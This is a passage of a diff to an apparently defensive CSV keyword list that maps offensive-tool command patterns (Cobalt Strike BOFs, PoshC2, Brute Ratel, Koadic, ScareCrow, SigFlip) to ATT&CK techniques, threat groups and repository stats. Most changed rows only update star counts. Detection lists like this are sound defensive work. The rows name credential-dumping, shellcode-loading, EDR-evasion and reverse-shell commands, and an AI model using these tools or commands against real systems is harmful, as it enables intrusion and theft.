- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "rev2self*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"runof *.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runof *.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "samdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "scrun.exe *","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "set CMD *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "set ENDPOINT *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" @@ -18767,19 +18957,19 @@ "sh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "sharescan *.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "shell.exe -u http://*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" -"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "show shellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "sleeper force","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper off","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper on","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sniffer -*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "SprayAD * * ","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "SprayAD.exe *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"sudomy -*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"sudomy -*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "TokenStrip *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "token-vault create*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 